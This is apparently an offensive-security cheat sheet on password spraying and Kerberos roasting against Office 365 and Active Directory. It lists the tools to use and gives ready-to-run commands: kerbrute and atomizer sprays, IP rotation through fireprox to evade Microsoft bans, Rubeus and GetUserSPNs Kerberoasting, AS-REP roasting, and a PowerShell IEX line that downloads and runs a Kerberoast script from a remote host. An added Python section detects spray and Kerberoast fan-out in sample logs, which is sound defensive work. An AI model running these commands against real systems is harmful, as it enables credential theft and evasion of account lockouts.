Spraying & Roasting
Search for email addresses based on the tech stack, default usernames, OSINT information etc., then enumerate which ones are valid with https://github.com/LMGsec/o365creeper. This does not cause logs to be written or lockouts to be triggered, so it is pretty safe to do.
Use https://github.com/dafthack/MSOLSpray to spray against Office 365. To avoid getting banned by Microsoft, using https://github.com/ustayready/fireprox as described in the MSOLSpray repo is advised; it uses an AWS API Gateway to rotate the IPs you are accessing from. An incrementing time-based lockout occurs after 10 attempts per account, so be careful.
Ideally this will result in at least 1 valid user account.
kerbrute passwordspray -d domain.local --dc dcip users.txt <password to spray>
atomizer.py owa mail.domain.local <password to spray> emails.txt
Make sure your time and time zone are in sync with the target's; Kerberos is very time sensitive. You can view the time zone on Windows with
tzutil /g
or, on Linux, use rdate -n <targetip>
Rubeus kerberoast /format:hashcat
GetUserSPNs.py <domain>/<username>:<password> -outputfile <outfile>
Add-Type -AssemblyName System.IdentityModel
setspn.exe -T <domain> -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }
powershell.exe -Command 'IEX (New-Object Net.Webclient).DownloadString("http://<ip>:<port>/Invoke-Kerberoast.ps1");Invoke-Kerberoast -OutputFormat Hashcat'
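On the domain controller, both the Kerberos password spray and the Kerberoast requests above look like one actor touching many distinct targets in a short time. The following is an added example, not part of the original page or of any tool named on it: it runs that fan-out check over constructed events. The field names, thresholds and 10-minute window are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real logs). Field names are an assumed,
# simplified normalisation of Windows Security log fields.
def _ev(ts, eid, ip, account, service="krbtgt", status="0x0", etype="0x12"):
    return {"time": datetime.fromisoformat(ts), "id": eid, "ip": ip,
            "account": account, "service": service, "status": status, "etype": etype}

SAMPLE = (
    # one source, one failed pre-auth (4771, 0x18 = bad password) per account
    [_ev(f"2024-01-01T09:00:{i:02d}", 4771, "10.0.0.50", f"user{i}", status="0x18")
     for i in range(12)]
    # a single user mistyping their own password several times
    + [_ev(f"2024-01-01T09:05:{i:02d}", 4771, "10.0.0.7", "alice", status="0x18")
       for i in range(5)]
    # one account requesting RC4 (0x17) service tickets for many SPN accounts
    + [_ev(f"2024-01-01T10:00:{i:02d}", 4769, "10.0.0.50", "user3",
           service=f"svc_sql{i}", etype="0x17") for i in range(6)]
    # normal AES ticket request for a machine account
    + [_ev("2024-01-01T10:01:00", 4769, "10.0.0.7", "alice", service="FILESRV$")]
)

def fan_out(events, match, actor, target, threshold, window=timedelta(minutes=10)):
    """Return {actor: distinct-target count} for actors that touch at least
    `threshold` distinct targets inside any sliding `window`."""
    per_actor = defaultdict(list)
    for e in sorted(filter(match, events), key=lambda e: e["time"]):
        per_actor[e[actor]].append(e)
    hits = {}
    for who, evs in per_actor.items():
        start = 0
        for end in range(len(evs)):
            while evs[end]["time"] - evs[start]["time"] > window:
                start += 1  # drop events that fell out of the window
            distinct = len({e[target] for e in evs[start:end + 1]})
            if distinct >= threshold:
                hits[who] = max(hits.get(who, 0), distinct)
    return hits

def detect_spray(events, threshold=10):
    # many distinct accounts failing pre-authentication from one source IP
    return fan_out(events, lambda e: e["id"] == 4771 and e["status"] == "0x18",
                   "ip", "account", threshold)

def detect_kerberoast(events, threshold=5):
    # one account pulling RC4 service tickets for many non-machine services
    return fan_out(events, lambda e: e["id"] == 4769 and e["etype"] == "0x17"
                   and not e["service"].endswith("$") and e["service"] != "krbtgt",
                   "account", "service", threshold)
```

A spray paced slower than the window stays under the threshold, so the window and thresholds need tuning against the environment's normal authentication volume.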
Without credentials for a list of users:
GetNPUsers.py <domain>/ -usersfile users.txt -format hashcat -outputfile <outfile> -dc-ip <dcip>
With credentials for all users:
GetNPUsers.py <domain>/<username>:<password> -request -format hashcat -outputfile <outfile>
Last modified 9mo ago